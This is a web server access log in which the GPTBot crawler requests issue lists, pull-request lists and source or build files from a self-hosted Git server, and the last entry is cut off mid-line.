+[17/Feb/2026:19:34:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full/localpycs/pyimod03_ctypes.pyc?display=rendered" [Client 74.7.227.38] [Length 11169] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full/localpycs/pyimod03_ctypes.pyc" +[17/Feb/2026:19:34:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full/localpycs/pyimod01_archive.pyc?display=rendered" [Client 74.7.227.38] [Length 11171] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full/localpycs/pyimod01_archive.pyc" +[17/Feb/2026:19:34:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.GlobalUsings.g.cs" [Client 74.7.227.38] [Length 11606] [Gzip 3.30] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/Debug/net8.0" +[17/Feb/2026:19:34:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&milestone=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10064] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=latest&state=open&type=all" +[17/Feb/2026:19:34:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&milestone=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10231] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&milestone=-1&state=open&type=all" +[17/Feb/2026:19:34:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&milestone=-1&project=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10224] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&milestone=-1&project=-1&state=closed&type=all" +[17/Feb/2026:19:34:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&labels=0&milestone=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10061] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&labels=0&milestone=-1&state=closed&type=all" +[17/Feb/2026:19:34:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&milestone=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10251] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=recentupdate&state=closed&type=all" +[17/Feb/2026:19:34:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&labels=0&project=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10227] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&labels=0&project=-1&state=open&type=all" +[17/Feb/2026:19:34:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?labels=0&project=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10179] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?project=-1&sort=oldest&state=all&type=all" +[17/Feb/2026:19:34:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?milestone=-1&project=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 9994] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:19:34:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&project=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 9993] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&project=-1&sort=oldest&state=closed&type=all" +[17/Feb/2026:19:34:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?milestone=-1&project=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 9992] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:19:34:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/branch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.GlobalUsings.g.cs" [Client 74.7.227.38] [Length 287] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.GlobalUsings.g.cs" +[17/Feb/2026:19:34:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/rss/branch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.GlobalUsings.g.cs" [Client 74.7.227.38] [Length 987] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.GlobalUsings.g.cs" +[17/Feb/2026:19:34:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?labels=0&milestone=-1&project=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10240] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?labels=0&project=-1&sort=oldest&state=closed&type=all" +[17/Feb/2026:19:34:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/.vscode/c_cpp_properties.json?display=source" [Client 74.7.227.38] [Length 11584] [Gzip 3.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/.vscode/c_cpp_properties.json" +[17/Feb/2026:19:34:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/.vscode/c_cpp_properties.json?display=source" [Client 74.7.227.38] [Length 11583] [Gzip 3.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/.vscode/c_cpp_properties.json" +[17/Feb/2026:19:34:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 9955] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?sort=farduedate&state=all&type=all" +[17/Feb/2026:19:34:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&labels=0&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10172] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?labels=0&sort=latest&state=all&type=all" +[17/Feb/2026:19:34:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&milestone=-1&project=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10220] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=farduedate&state=open&type=all" +[17/Feb/2026:19:34:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?labels=0&milestone=-1&project=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10032] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?labels=0&milestone=-1&project=-1&state=closed&type=all" +[17/Feb/2026:19:34:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?labels=0&milestone=-1&project=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10046] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?labels=0&milestone=-1&sort=mostcomment&state=open&type=all" +[17/Feb/2026:19:34:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?labels=0&milestone=-1&project=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10228] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?labels=0&milestone=-1&project=-1&state=open&type=all" +[17/Feb/2026:19:34:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?labels=0&milestone=-1&project=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10049] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?labels=0&milestone=-1&project=-1&state=open&type=all" +[17/Feb/2026:19:34:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?labels=0&project=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10003] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?labels=0&project=-1&state=all&type=all" +[17/Feb/2026:19:34:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&labels=0&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10038] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&labels=0&state=closed&type=all" +[17/Feb/2026:19:34:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&labels=0&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10036] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&labels=0&sort=latest&state=closed&type=all" +[17/Feb/2026:19:34:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&project=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10001] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&project=-1&state=all&type=all" +[17/Feb/2026:19:34:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&milestone=-1&project=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10038] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&project=-1&sort=oldest&state=open&type=all" +[17/Feb/2026:19:34:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&milestone=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10004] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&milestone=-1&state=all&type=all" +[17/Feb/2026:19:34:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&milestone=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10001] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&milestone=-1&state=all&type=all" +[17/Feb/2026:19:34:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&labels=0&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10176] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?labels=0&sort=oldest&state=all&type=all" +[17/Feb/2026:19:34:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/html/index.html?display=source" [Client 74.7.227.38] [Length 38602] [Gzip 9.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/index.html" +[17/Feb/2026:19:34:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6?files=PostgresMonitor%2fbuild%2fPostgresWatchdog%2fwarn-PostgresWatchdog.txt" [Client 74.7.227.38] [Length 20438] [Gzip 4.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/warn-PostgresWatchdog.txt" +[17/Feb/2026:19:34:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&labels=0&milestone=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10225] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&labels=0&milestone=-1&state=closed&type=all" +[17/Feb/2026:19:34:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&labels=0&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10042] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&labels=0&state=closed&type=all" +[17/Feb/2026:19:34:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&milestone=-1&project=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10054] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&milestone=-1&project=-1&state=open&type=all" +[17/Feb/2026:19:34:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&project=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10005] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&project=-1&state=all&type=all" +[17/Feb/2026:19:35:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&milestone=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10003] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&milestone=-1&state=all&type=all" +[17/Feb/2026:19:35:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&milestone=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10001] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&milestone=-1&state=all&type=all" +[17/Feb/2026:19:35:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?labels=0&milestone=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10002] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?labels=0&milestone=-1&sort=nearduedate&state=all&type=all" +[17/Feb/2026:19:35:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?labels=0&milestone=-1&project=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10227] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?labels=0&milestone=-1&project=-1&state=open&type=all" +[17/Feb/2026:19:35:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?labels=0&milestone=-1&project=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10240] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?labels=0&milestone=-1&project=-1&state=closed&type=all" +[17/Feb/2026:19:35:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?labels=0&milestone=-1&project=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10031] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?labels=0&milestone=-1&project=-1&state=closed&type=all" +[17/Feb/2026:19:35:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&labels=0&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10238] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&labels=0&sort=oldest&state=closed&type=all" +[17/Feb/2026:19:35:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&milestone=-1&project=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10064] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=recentupdate&state=closed&type=all" +[17/Feb/2026:19:35:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?labels=0&milestone=-1&project=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10239] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?labels=0&milestone=-1&project=-1&state=closed&type=all" +[17/Feb/2026:19:35:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?labels=0&milestone=-1&project=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10242] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?labels=0&milestone=-1&sort=leastcomment&state=closed&type=all" +[17/Feb/2026:19:35:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&milestone=-1&project=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10235] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&milestone=-1&project=-1&state=closed&type=all" +[17/Feb/2026:19:35:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&milestone=-1&project=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10060] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&milestone=-1&sort=mostcomment&state=closed&type=all" +[17/Feb/2026:19:35:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&milestone=-1&project=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10064] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&milestone=-1&sort=leastcomment&state=closed&type=all" +[17/Feb/2026:19:35:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&milestone=-1&project=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10035] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&milestone=-1&project=-1&state=closed&type=all" +[17/Feb/2026:19:35:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&labels=0&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 9970] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&labels=0&state=all&type=all" +[17/Feb/2026:19:35:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/C++Project/TestProject/.vscode/tasks.json" [Client 74.7.227.38] [Length 740] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/.vscode/tasks.json" +[17/Feb/2026:19:35:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/C++Project/TestProject/.vscode/tasks.json" [Client 74.7.227.38] [Length 907] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/.vscode/tasks.json" +[17/Feb/2026:19:35:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?labels=0&milestone=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10013] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?labels=0&milestone=-1&sort=nearduedate&state=all&type=all" +[17/Feb/2026:19:35:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&project=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 9998] [Gzip 